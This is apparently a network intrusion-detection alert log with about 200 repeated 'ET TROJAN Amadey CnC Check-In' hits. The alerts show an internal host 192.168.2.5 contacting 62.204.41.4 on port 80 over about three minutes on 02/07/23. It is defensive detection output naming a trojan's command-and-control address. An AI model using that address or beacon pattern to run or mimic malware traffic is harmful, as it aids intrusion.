192.168.2.562.204.41.450220802027700 02/07/23-19:59:28.638484	TCP	2027700	ET TROJAN Amadey CnC Check-In	50220	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450401802027700 02/07/23-20:00:16.704967	TCP	2027700	ET TROJAN Amadey CnC Check-In	50401	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450391802027700 02/07/23-20:00:14.311492	TCP	2027700	ET TROJAN Amadey CnC Check-In	50391	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450303802027700 02/07/23-19:59:50.704498	TCP	2027700	ET TROJAN Amadey CnC Check-In	50303	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450045802027700 02/07/23-19:58:38.414558	TCP	2027700	ET TROJAN Amadey CnC Check-In	50045	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449883802027700 02/07/23-19:57:54.965082	TCP	2027700	ET TROJAN Amadey CnC Check-In	49883	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450051802027700 02/07/23-19:58:39.861264	TCP	2027700	ET TROJAN Amadey CnC Check-In	50051	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450299802027700 02/07/23-19:59:49.758751	TCP	2027700	ET TROJAN Amadey CnC Check-In	50299	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449916802027700 02/07/23-19:58:03.032699	TCP	2027700	ET TROJAN Amadey CnC Check-In	49916	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450134802027700 02/07/23-19:59:04.959509	TCP	2027700	ET TROJAN Amadey CnC Check-In	50134	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449785802027700 02/07/23-19:57:28.117998	TCP	2027700	ET TROJAN Amadey CnC Check-In	49785	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450388802027700 02/07/23-20:00:13.583065	TCP	2027700	ET TROJAN Amadey CnC Check-In	50388	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449972802027700 02/07/23-19:58:18.490991	TCP	2027700	ET TROJAN Amadey CnC Check-In	49972	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450106802027700 02/07/23-19:58:55.697715	TCP	2027700	ET TROJAN Amadey CnC Check-In	50106	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449966802027700 02/07/23-19:58:17.026384	TCP	2027700	ET TROJAN Amadey CnC Check-In	49966	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450420802027700 02/07/23-20:00:23.363085	TCP	2027700	ET TROJAN Amadey CnC Check-In	50420	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450017802027700 02/07/23-19:58:31.793987	TCP	2027700	ET TROJAN Amadey CnC Check-In	50017	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449712802027700 02/07/23-19:57:09.572156	TCP	2027700	ET TROJAN Amadey CnC Check-In	49712	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449801802027700 02/07/23-19:57:31.978610	TCP	2027700	ET TROJAN Amadey CnC Check-In	49801	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449925802027700 02/07/23-19:58:07.476078	TCP	2027700	ET TROJAN Amadey CnC Check-In	49925	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450236802027700 02/07/23-19:59:32.439969	TCP	2027700	ET TROJAN Amadey CnC Check-In	50236	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449842802027700 02/07/23-19:57:41.717333	TCP	2027700	ET TROJAN Amadey CnC Check-In	49842	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449753802027700 02/07/23-19:57:18.413042	TCP	2027700	ET TROJAN Amadey CnC Check-In	49753	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450331802027700 02/07/23-19:59:57.512462	TCP	2027700	ET TROJAN Amadey CnC Check-In	50331	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449699802027700 02/07/23-19:57:03.880243	TCP	2027700	ET TROJAN Amadey CnC Check-In	49699	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450372802027700 02/07/23-20:00:09.704797	TCP	2027700	ET TROJAN Amadey CnC Check-In	50372	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450461802027700 02/07/23-20:00:32.989437	TCP	2027700	ET TROJAN Amadey CnC Check-In	50461	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449772802027700 02/07/23-19:57:22.305855	TCP	2027700	ET TROJAN Amadey CnC Check-In	49772	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450188802027700 02/07/23-19:59:18.207900	TCP	2027700	ET TROJAN Amadey CnC Check-In	50188	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450023802027700 02/07/23-19:58:33.280642	TCP	2027700	ET TROJAN Amadey CnC Check-In	50023	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450064802027700 02/07/23-19:58:44.287580	TCP	2027700	ET TROJAN Amadey CnC Check-In	50064	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450277802027700 02/07/23-19:59:44.403140	TCP	2027700	ET TROJAN Amadey CnC Check-In	50277	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450319802027700 02/07/23-19:59:54.594853	TCP	2027700	ET TROJAN Amadey CnC Check-In	50319	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450147802027700 02/07/23-19:59:08.302721	TCP	2027700	ET TROJAN Amadey CnC Check-In	50147	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450151802027700 02/07/23-19:59:09.287465	TCP	2027700	ET TROJAN Amadey CnC Check-In	50151	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449979802027700 02/07/23-19:58:20.181959	TCP	2027700	ET TROJAN Amadey CnC Check-In	49979	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450439802027700 02/07/23-20:00:27.911911	TCP	2027700	ET TROJAN Amadey CnC Check-In	50439	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449921802027700 02/07/23-19:58:04.595004	TCP	2027700	ET TROJAN Amadey CnC Check-In	49921	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450390802027700 02/07/23-20:00:14.048984	TCP	2027700	ET TROJAN Amadey CnC Check-In	50390	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450068802027700 02/07/23-19:58:46.433814	TCP	2027700	ET TROJAN Amadey CnC Check-In	50068	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450424802027700 02/07/23-20:00:24.325922	TCP	2027700	ET TROJAN Amadey CnC Check-In	50424	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450246802027700 02/07/23-19:59:34.827639	TCP	2027700	ET TROJAN Amadey CnC Check-In	50246	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449743802027700 02/07/23-19:57:16.382887	TCP	2027700	ET TROJAN Amadey CnC Check-In	49743	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449771802027700 02/07/23-19:57:22.069473	TCP	2027700	ET TROJAN Amadey CnC Check-In	49771	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449899802027700 02/07/23-19:57:58.885147	TCP	2027700	ET TROJAN Amadey CnC Check-In	49899	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450301802027700 02/07/23-19:59:50.234623	TCP	2027700	ET TROJAN Amadey CnC Check-In	50301	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450279802027700 02/07/23-19:59:44.920542	TCP	2027700	ET TROJAN Amadey CnC Check-In	50279	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450010802027700 02/07/23-19:58:30.047946	TCP	2027700	ET TROJAN Amadey CnC Check-In	50010	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450362802027700 02/07/23-20:00:07.266629	TCP	2027700	ET TROJAN Amadey CnC Check-In	50362	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450123802027700 02/07/23-19:58:59.760627	TCP	2027700	ET TROJAN Amadey CnC Check-In	50123	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449838802027700 02/07/23-19:57:40.748973	TCP	2027700	ET TROJAN Amadey CnC Check-In	49838	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450184802027700 02/07/23-19:59:17.230713	TCP	2027700	ET TROJAN Amadey CnC Check-In	50184	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450380802027700 02/07/23-20:00:11.655903	TCP	2027700	ET TROJAN Amadey CnC Check-In	50380	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450457802027700 02/07/23-20:00:31.981578	TCP	2027700	ET TROJAN Amadey CnC Check-In	50457	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450105802027700 02/07/23-19:58:55.457749	TCP	2027700	ET TROJAN Amadey CnC Check-In	50105	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449700802027700 02/07/23-19:57:04.269931	TCP	2027700	ET TROJAN Amadey CnC Check-In	49700	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449856802027700 02/07/23-19:57:48.633799	TCP	2027700	ET TROJAN Amadey CnC Check-In	49856	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450429802027700 02/07/23-20:00:25.500722	TCP	2027700	ET TROJAN Amadey CnC Check-In	50429	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449833802027700 02/07/23-19:57:39.543463	TCP	2027700	ET TROJAN Amadey CnC Check-In	49833	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450297802027700 02/07/23-19:59:49.266256	TCP	2027700	ET TROJAN Amadey CnC Check-In	50297	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450452802027700 02/07/23-20:00:31.039414	TCP	2027700	ET TROJAN Amadey CnC Check-In	50452	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450334802027700 02/07/23-19:59:58.221791	TCP	2027700	ET TROJAN Amadey CnC Check-In	50334	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449874802027700 02/07/23-19:57:52.779348	TCP	2027700	ET TROJAN Amadey CnC Check-In	49874	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449894802027700 02/07/23-19:57:57.677143	TCP	2027700	ET TROJAN Amadey CnC Check-In	49894	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449911802027700 02/07/23-19:58:01.794028	TCP	2027700	ET TROJAN Amadey CnC Check-In	49911	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450274802027700 02/07/23-19:59:42.509237	TCP	2027700	ET TROJAN Amadey CnC Check-In	50274	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450256802027700 02/07/23-19:59:37.251534	TCP	2027700	ET TROJAN Amadey CnC Check-In	50256	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450078802027700 02/07/23-19:58:48.869935	TCP	2027700	ET TROJAN Amadey CnC Check-In	50078	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449715802027700 02/07/23-19:57:10.319689	TCP	2027700	ET TROJAN Amadey CnC Check-In	49715	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449733802027700 02/07/23-19:57:13.945819	TCP	2027700	ET TROJAN Amadey CnC Check-In	49733	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450096802027700 02/07/23-19:58:53.262318	TCP	2027700	ET TROJAN Amadey CnC Check-In	50096	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450352802027700 02/07/23-20:00:04.891222	TCP	2027700	ET TROJAN Amadey CnC Check-In	50352	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450156802027700 02/07/23-19:59:10.481824	TCP	2027700	ET TROJAN Amadey CnC Check-In	50156	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450228802027700 02/07/23-19:59:30.531227	TCP	2027700	ET TROJAN Amadey CnC Check-In	50228	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449805802027700 02/07/23-19:57:32.928581	TCP	2027700	ET TROJAN Amadey CnC Check-In	49805	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450447802027700 02/07/23-20:00:29.817138	TCP	2027700	ET TROJAN Amadey CnC Check-In	50447	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450406802027700 02/07/23-20:00:17.910532	TCP	2027700	ET TROJAN Amadey CnC Check-In	50406	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449710802027700 02/07/23-19:57:09.099241	TCP	2027700	ET TROJAN Amadey CnC Check-In	49710	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450115802027700 02/07/23-19:58:57.838937	TCP	2027700	ET TROJAN Amadey CnC Check-In	50115	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450311802027700 02/07/23-19:59:52.679367	TCP	2027700	ET TROJAN Amadey CnC Check-In	50311	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450133802027700 02/07/23-19:59:03.417426	TCP	2027700	ET TROJAN Amadey CnC Check-In	50133	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450174802027700 02/07/23-19:59:14.839891	TCP	2027700	ET TROJAN Amadey CnC Check-In	50174	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449828802027700 02/07/23-19:57:38.323716	TCP	2027700	ET TROJAN Amadey CnC Check-In	49828	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450027802027700 02/07/23-19:58:34.302753	TCP	2027700	ET TROJAN Amadey CnC Check-In	50027	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450284802027700 02/07/23-19:59:46.139610	TCP	2027700	ET TROJAN Amadey CnC Check-In	50284	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449846802027700 02/07/23-19:57:42.696965	TCP	2027700	ET TROJAN Amadey CnC Check-In	49846	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450462802027700 02/07/23-20:00:33.222235	TCP	2027700	ET TROJAN Amadey CnC Check-In	50462	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450205802027700 02/07/23-19:59:23.312322	TCP	2027700	ET TROJAN Amadey CnC Check-In	50205	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449705802027700 02/07/23-19:57:06.909903	TCP	2027700	ET TROJAN Amadey CnC Check-In	49705	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450321802027700 02/07/23-19:59:55.064377	TCP	2027700	ET TROJAN Amadey CnC Check-In	50321	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449962802027700 02/07/23-19:58:16.087938	TCP	2027700	ET TROJAN Amadey CnC Check-In	49962	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449990802027700 02/07/23-19:58:22.962299	TCP	2027700	ET TROJAN Amadey CnC Check-In	49990	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450113802027700 02/07/23-19:58:57.370709	TCP	2027700	ET TROJAN Amadey CnC Check-In	50113	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450465802027700 02/07/23-20:00:33.942201	TCP	2027700	ET TROJAN Amadey CnC Check-In	50465	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450287802027700 02/07/23-19:59:46.895270	TCP	2027700	ET TROJAN Amadey CnC Check-In	50287	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449702802027700 02/07/23-19:57:05.106586	TCP	2027700	ET TROJAN Amadey CnC Check-In	49702	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449730802027700 02/07/23-19:57:13.243832	TCP	2027700	ET TROJAN Amadey CnC Check-In	49730	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449876802027700 02/07/23-19:57:53.245417	TCP	2027700	ET TROJAN Amadey CnC Check-In	49876	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450143802027700 02/07/23-19:59:07.357882	TCP	2027700	ET TROJAN Amadey CnC Check-In	50143	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449818802027700 02/07/23-19:57:36.123767	TCP	2027700	ET TROJAN Amadey CnC Check-In	49818	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450146802027700 02/07/23-19:59:08.058254	TCP	2027700	ET TROJAN Amadey CnC Check-In	50146	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450437802027700 02/07/23-20:00:27.438497	TCP	2027700	ET TROJAN Amadey CnC Check-In	50437	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450434802027700 02/07/23-20:00:26.717538	TCP	2027700	ET TROJAN Amadey CnC Check-In	50434	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450324802027700 02/07/23-19:59:55.796737	TCP	2027700	ET TROJAN Amadey CnC Check-In	50324	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449989802027700 02/07/23-19:58:22.562862	TCP	2027700	ET TROJAN Amadey CnC Check-In	49989	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449871802027700 02/07/23-19:57:52.296229	TCP	2027700	ET TROJAN Amadey CnC Check-In	49871	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449897802027700 02/07/23-19:57:58.416673	TCP	2027700	ET TROJAN Amadey CnC Check-In	49897	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449815802027700 02/07/23-19:57:35.404124	TCP	2027700	ET TROJAN Amadey CnC Check-In	49815	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450426802027700 02/07/23-20:00:24.801297	TCP	2027700	ET TROJAN Amadey CnC Check-In	50426	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450100802027700 02/07/23-19:58:54.228469	TCP	2027700	ET TROJAN Amadey CnC Check-In	50100	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449807802027700 02/07/23-19:57:33.429668	TCP	2027700	ET TROJAN Amadey CnC Check-In	49807	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450098802027700 02/07/23-19:58:53.748513	TCP	2027700	ET TROJAN Amadey CnC Check-In	50098	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450360802027700 02/07/23-20:00:06.784027	TCP	2027700	ET TROJAN Amadey CnC Check-In	50360	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450409802027700 02/07/23-20:00:18.614092	TCP	2027700	ET TROJAN Amadey CnC Check-In	50409	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449848802027700 02/07/23-19:57:43.671762	TCP	2027700	ET TROJAN Amadey CnC Check-In	49848	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450141802027700 02/07/23-19:59:06.885723	TCP	2027700	ET TROJAN Amadey CnC Check-In	50141	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449784802027700 02/07/23-19:57:27.871680	TCP	2027700	ET TROJAN Amadey CnC Check-In	49784	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450182802027700 02/07/23-19:59:16.745810	TCP	2027700	ET TROJAN Amadey CnC Check-In	50182	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450218802027700 02/07/23-19:59:28.144912	TCP	2027700	ET TROJAN Amadey CnC Check-In	50218	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450259802027700 02/07/23-19:59:37.982209	TCP	2027700	ET TROJAN Amadey CnC Check-In	50259	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450389802027700 02/07/23-20:00:13.814637	TCP	2027700	ET TROJAN Amadey CnC Check-In	50389	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450289802027700 02/07/23-19:59:47.359030	TCP	2027700	ET TROJAN Amadey CnC Check-In	50289	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450000802027700 02/07/23-19:58:27.513822	TCP	2027700	ET TROJAN Amadey CnC Check-In	50000	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449889802027700 02/07/23-19:57:56.483664	TCP	2027700	ET TROJAN Amadey CnC Check-In	49889	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449713802027700 02/07/23-19:57:09.809088	TCP	2027700	ET TROJAN Amadey CnC Check-In	49713	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450041802027700 02/07/23-19:58:37.467492	TCP	2027700	ET TROJAN Amadey CnC Check-In	50041	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450118802027700 02/07/23-19:58:58.558092	TCP	2027700	ET TROJAN Amadey CnC Check-In	50118	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450171802027700 02/07/23-19:59:14.125363	TCP	2027700	ET TROJAN Amadey CnC Check-In	50171	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450467802027700 02/07/23-20:00:34.410744	TCP	2027700	ET TROJAN Amadey CnC Check-In	50467	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449843802027700 02/07/23-19:57:41.966115	TCP	2027700	ET TROJAN Amadey CnC Check-In	49843	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449884802027700 02/07/23-19:57:55.199529	TCP	2027700	ET TROJAN Amadey CnC Check-In	49884	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450248802027700 02/07/23-19:59:35.309770	TCP	2027700	ET TROJAN Amadey CnC Check-In	50248	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449881802027700 02/07/23-19:57:54.464877	TCP	2027700	ET TROJAN Amadey CnC Check-In	49881	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450154802027700 02/07/23-19:59:10.010091	TCP	2027700	ET TROJAN Amadey CnC Check-In	50154	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450243802027700 02/07/23-19:59:34.125339	TCP	2027700	ET TROJAN Amadey CnC Check-In	50243	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449970802027700 02/07/23-19:58:17.986268	TCP	2027700	ET TROJAN Amadey CnC Check-In	49970	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450332802027700 02/07/23-19:59:57.750216	TCP	2027700	ET TROJAN Amadey CnC Check-In	50332	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449774802027700 02/07/23-19:57:22.791511	TCP	2027700	ET TROJAN Amadey CnC Check-In	49774	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450047802027700 02/07/23-19:58:38.899810	TCP	2027700	ET TROJAN Amadey CnC Check-In	50047	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450399802027700 02/07/23-20:00:16.236683	TCP	2027700	ET TROJAN Amadey CnC Check-In	50399	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449835802027700 02/07/23-19:57:40.026952	TCP	2027700	ET TROJAN Amadey CnC Check-In	49835	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449924802027700 02/07/23-19:58:07.066105	TCP	2027700	ET TROJAN Amadey CnC Check-In	49924	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450065802027700 02/07/23-19:58:45.626874	TCP	2027700	ET TROJAN Amadey CnC Check-In	50065	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450019802027700 02/07/23-19:58:32.292789	TCP	2027700	ET TROJAN Amadey CnC Check-In	50019	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450365802027700 02/07/23-20:00:08.016119	TCP	2027700	ET TROJAN Amadey CnC Check-In	50365	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450215802027700 02/07/23-19:59:27.402726	TCP	2027700	ET TROJAN Amadey CnC Check-In	50215	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449746802027700 02/07/23-19:57:17.135800	TCP	2027700	ET TROJAN Amadey CnC Check-In	49746	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449942802027700 02/07/23-19:58:11.343155	TCP	2027700	ET TROJAN Amadey CnC Check-In	49942	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450108802027700 02/07/23-19:58:56.182131	TCP	2027700	ET TROJAN Amadey CnC Check-In	50108	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450304802027700 02/07/23-19:59:50.968034	TCP	2027700	ET TROJAN Amadey CnC Check-In	50304	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450187802027700 02/07/23-19:59:17.949465	TCP	2027700	ET TROJAN Amadey CnC Check-In	50187	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449853802027700 02/07/23-19:57:47.844021	TCP	2027700	ET TROJAN Amadey CnC Check-In	49853	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450454802027700 02/07/23-20:00:31.504096	TCP	2027700	ET TROJAN Amadey CnC Check-In	50454	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449764802027700 02/07/23-19:57:20.603429	TCP	2027700	ET TROJAN Amadey CnC Check-In	49764	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450031802027700 02/07/23-19:58:35.304361	TCP	2027700	ET TROJAN Amadey CnC Check-In	50031	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450383802027700 02/07/23-20:00:12.387972	TCP	2027700	ET TROJAN Amadey CnC Check-In	50383	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450120802027700 02/07/23-19:58:59.032260	TCP	2027700	ET TROJAN Amadey CnC Check-In	50120	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450276802027700 02/07/23-19:59:43.973222	TCP	2027700	ET TROJAN Amadey CnC Check-In	50276	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450126802027700 02/07/23-19:59:00.503245	TCP	2027700	ET TROJAN Amadey CnC Check-In	50126	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449952802027700 02/07/23-19:58:13.723295	TCP	2027700	ET TROJAN Amadey CnC Check-In	49952	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450037802027700 02/07/23-19:58:36.516957	TCP	2027700	ET TROJAN Amadey CnC Check-In	50037	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449958802027700 02/07/23-19:58:15.137846	TCP	2027700	ET TROJAN Amadey CnC Check-In	49958	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450003802027700 02/07/23-19:58:28.269253	TCP	2027700	ET TROJAN Amadey CnC Check-In	50003	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449863802027700 02/07/23-19:57:50.367777	TCP	2027700	ET TROJAN Amadey CnC Check-In	49863	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450192802027700 02/07/23-19:59:19.202750	TCP	2027700	ET TROJAN Amadey CnC Check-In	50192	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450393802027700 02/07/23-20:00:14.802337	TCP	2027700	ET TROJAN Amadey CnC Check-In	50393	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449792802027700 02/07/23-19:57:29.791091	TCP	2027700	ET TROJAN Amadey CnC Check-In	49792	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449869802027700 02/07/23-19:57:51.811174	TCP	2027700	ET TROJAN Amadey CnC Check-In	49869	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449999802027700 02/07/23-19:58:27.278096	TCP	2027700	ET TROJAN Amadey CnC Check-In	49999	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450088802027700 02/07/23-19:58:51.281257	TCP	2027700	ET TROJAN Amadey CnC Check-In	50088	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450370802027700 02/07/23-20:00:09.189137	TCP	2027700	ET TROJAN Amadey CnC Check-In	50370	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450281802027700 02/07/23-19:59:45.414960	TCP	2027700	ET TROJAN Amadey CnC Check-In	50281	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450110802027700 02/07/23-19:58:56.657477	TCP	2027700	ET TROJAN Amadey CnC Check-In	50110	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450021802027700 02/07/23-19:58:32.794730	TCP	2027700	ET TROJAN Amadey CnC Check-In	50021	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450177802027700 02/07/23-19:59:15.563617	TCP	2027700	ET TROJAN Amadey CnC Check-In	50177	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450419802027700 02/07/23-20:00:23.118934	TCP	2027700	ET TROJAN Amadey CnC Check-In	50419	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450269802027700 02/07/23-19:59:40.413543	TCP	2027700	ET TROJAN Amadey CnC Check-In	50269	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449993802027700 02/07/23-19:58:24.614337	TCP	2027700	ET TROJAN Amadey CnC Check-In	49993	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450009802027700 02/07/23-19:58:29.797002	TCP	2027700	ET TROJAN Amadey CnC Check-In	50009	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449812802027700 02/07/23-19:57:34.636727	TCP	2027700	ET TROJAN Amadey CnC Check-In	49812	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449879802027700 02/07/23-19:57:53.960321	TCP	2027700	ET TROJAN Amadey CnC Check-In	49879	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449720802027700 02/07/23-19:57:10.789751	TCP	2027700	ET TROJAN Amadey CnC Check-In	49720	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449723802027700 02/07/23-19:57:11.507306	TCP	2027700	ET TROJAN Amadey CnC Check-In	49723	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449968802027700 02/07/23-19:58:17.511977	TCP	2027700	ET TROJAN Amadey CnC Check-In	49968	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449901802027700 02/07/23-19:57:59.369719	TCP	2027700	ET TROJAN Amadey CnC Check-In	49901	80	192.168.2.5	62.204.41.4
